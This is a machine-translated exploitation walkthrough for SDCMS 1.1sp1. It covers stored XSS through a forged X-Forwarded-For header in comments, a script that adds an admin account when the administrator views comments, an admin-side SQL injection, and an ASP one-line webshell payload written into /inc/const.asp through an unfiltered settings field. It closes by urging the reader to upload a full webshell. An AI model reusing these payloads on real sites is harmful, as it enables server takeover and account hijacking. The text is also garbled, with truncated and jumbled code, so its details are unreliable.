XSS vulnerability mining and exploitation of SDCMS 1.1sp1

SDCMS: website information management system of the times. SDCMS is a website information management system based on ASP + ACCESS/MSSQL. Free permanently, open source! SDCMS uses information as the topic, starts with text and image titles, and supports unlimited topic categories. With the flexible use of multiple plug-ins, SDCMS achieves the vision of information portals!
 
SDCMS summarizes the status quo of various information portals and fully considers the situation that meets the requirements of webmasters. A flexible label call method is designed to meet the needs of different levels.
 
Based on the principle of security first, SDCMS solves Common Vulnerabilities of ASP programs (except for problems of servers ). The program itself does not have any backdoors, and the strict code filtering function provides a reliable guarantee for the secure operation of the website.
 
 
 
The above is the SDCMS website's evaluation of its own products. Indeed, its beautiful interface and flexible plug-ins reflect this point. In terms of security, sensitive symbols are filtered out for anti-Injection Protection, which plays a protective role.
 
 
 
Its security, appearance, and scalability make it the perfect choice for many site builders. We can find the google Keyword "power by sdcms.
 
But the wise man may lose a thousand filters. Generally, the most common and negligible part is the most prone to problems. (Its official website is: http://www.sdcms.cn you can go down to the source code)
 
 
 
Let's take a look at the following code:
 
(Note: This method can be used only when the Administrator permits comments. However, the Administrator generally allows comments)
 
In/plug/comment. asp
 
Sub save_comment
 
......
 
Username = sdcms_f.HTMLEncode (username)
 
Content = sdcms_f.contentEncode (content)
 
Ip = sdcms_f.getip 'Please refer to here and get your IP address here.
 
 
 
Set rs = server. CreateObject ("adodb. recordset ")
 
SQL = "select username, content, ip, infoid, ispass from sd_comment"
 
Rs. open SQL, conn, 1, 3
 
Rs. addnew
 
Rs (0) = left (username, 10)
 
Rs (1) = content
 
Rs (2) = ip // No filtering, directly inserted into the database.
 
Rs (3) = id
 
If sdcms_comment_ispass = 1 then
 
Msg_contents = ", please wait for review"
 
Rs (4) = 0
 
Else
 
Rs (4) = 1
 
End if
 
Rs. update
 
......
 
End sub
 
 
 
Let's take a look at the implementation of getip,
 
In/inc/function. asp
 
Public Function getip
 
Ip = request. ServerVariables ("HTTP_X_FORWARDED_FOR ")
 
If ip = "" then ip = Request. ServerVariables ("REMOTE_ADDR ")
 
Getip = ip
 
End function
 
We all know that the problem exists. The author uses the "HTTP_X_FORWARDED_FOR" field to obtain the IP value. We know that this field can be forged in data packets.
 
We can forge data packets and change the value of "HTTP_X_FORWARDED_FOR" to a single-statement trojan for submission. In this way, a single-statement Trojan is directly inserted into the database. if we know the database location and the database suffix is asp, we can directly use it.
 
Unfortunately, the name of the CMS database is unknown. During installation, 12 random characters are generated by the following code, and the suffix is still mdb. Therefore, we need to insert a sentence, it cannot be used either.
 
/Install/index. asp
 
Function get_something
 
Randomize
 
Do While Len (pass) <12' random password digits
 
Num1 = CStr (Chr (57-48) * rnd + 48) '0 ~ 9
 
Num2 = CStr (Chr (90-65) * rnd + 65) 'A ~ Z
 
Num3 = CStr (Chr (122-97) * rnd + 97) 'A ~ Z
 
Pass = pass & num1 & num2 & num3
 
Loop
 
Get_something = pass
 
End function
 
We want to use another method for intrusion.
 
See the following code:
 
/Admin/sdcms_comment.asp
 
Sub main
 
Echo "<form name =" "add" "action = ""? "" Method = "" post "" onSubmit = "" return confirm ('Are you sure you want to perform the selected operation? '); "">"
 
Page = request. querystring ("page ")
 
If page = "" or not isnumeric (page) then
 
Page = 1
 
End if
 
Pages = 20
 
Set rs = server. CreateObject ("adodb. recordset ")
 
If request ("classid") <> 0 then tj = "where infoid =" & request ("classid") & "'has an injection vulnerability, although classid = sdcms is used above. requestint (classid) to obtain its integer, but when it is stored in SQL, it does not use classid for query, but directly uses request ("classid") for query, when preventing injection, the author does not filter its values, so it can be injected. However, the premise of this injection is that it has the Administrator permission. Therefore, we will not discuss it.
SQL = "select id, username ,"
 
If Is_ SQL = 0 then
 
SQL = SQL & "(iif (ispass = 1, 'reviewed ', 'unaudited '))"
 
Else
 
Www.2cto.com
SQL = SQL & "(case ispass when 1 then 'audited 'else' unaudited 'end )"
 
End if
 
SQL = SQL & ", ip, adddate, content, ispass, infoid from" & sd_table & "& tj &" order by ispass, id desc"
 
'The author uses SQL statements to directly find the IP address value and uses the following code to display it on the page without any filtering.
 
<Td class = "title_bg" style = "text-align: left"> <span style = "float: right"> <% if rs (6) = 0 then %> <a href = "? Action = pass & id = <% = rs (0) %> & t = 1 & classid = <% = classid %> "> Verification passed </a> <% else %> <a href = "? Action = pass & id = <% = rs (0) %> & t = 0 & classid = <% = classid %> "> cancel verification </a> <% end if %> <a href = "? Action = del & id = <% = rs (0) %> & classid = <% = classid %> ", false );
 
Ajax. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ");
 
Ajax. send ("t0 = test & t1 = test & t2 = 1 ");
 
After the Administrator browses the comments, an account is automatically added.
 
I mentioned this in my previous articles, so I will not elaborate on it.
 
Next we will show you how to use shell. Let's take a look at the code of the configuration written in the background:
 
In/admin/sdcms_set.asp
 
Set fso = server. CreateObject ("scripting. filesystemobject ")
 
Set info = fso. CreateTextFile (Server. mappath ("../inc/const. asp"), true)
 
Info. write "<" & "%" & vbcrlf
 
......
 
Info. write "%" & ">"
 
Info. close
 
Set info = nothing
 
Set fso = nothing
 
The author writes the configuration file to/inc/const. asp,
 
In
 
Sub save
 
T0 = clear_bad (trim (request ("t0 ")))
 
T1 = clear_bad (trim (request ("t1 ")))
 
T2 = clear_bad (trim (request ("t2 ")))
 
T3 = clear_bad (trim (request ("t3 ")))
 
T4 = clear_bad (trim (request ("t4 ")))
 
T5 = clear_bad (trim (request ("t5 ")))
 
T6 = clear_bad (trim (request ("t6 ")))
 
T7 = clear_bad (trim (request ("t7 ")))
 
T8 = clear_bad (trim (request ("t8 ")))
 
T9 = clear_bad (trim (request ("t9 ")))
 
T10 = clear_bad (trim (request ("t10 ")))
 
T11 = clear_bad (trim (request ("t11 ")))
 
T12 = clear_bad (trim (request ("t12 ")))
 
T13 = trim (request ("t13 "))
 
T14 = dir_check (trim (request ("t14 ")))
 
T15 = trim (request ("t15 "))
 
T16 = trim (request ("t16 "))
 
T17 = dir_check (trim (request ("t17 ")))
 
If t17 <> "" then t17 = t17 &"/"
 
Select case t3
 
Case ". htm", ". html", ". shtml"
 
Case else: t3 = ". html"
 
End select
 
Select case t13
 
Case "0", "1"
 
Case else: t13 = 0
 
End select
 
Set sdcms_f = new sdcms_function
 
T9 = sdcms_f.check_event (t9, "|"): t10 = sdcms_f.check_event (t10, "|"): t11 = sdcms_f.check_event (t11, "| ")
 
Set sdcms_f = nothing,
 
The submitted parameters are filtered.
 
Function clear_bad (t0)
 
Clear_bad = Replace (t0 ,"""","")
 
Clear_bad = Replace (t0, CHR (10 ),"")
 
End Function
 
We can see that the values of t15 and t16 are not filtered.
 
T16 is a file name item in preference settings.
 
Therefore, we changed the file name value to test "%> <% execute request (" value ") %> <% a =" test
 
In this way, we write a trojan in the/inc/const. asp file.
 
Then upload the large webshell and you will be OK.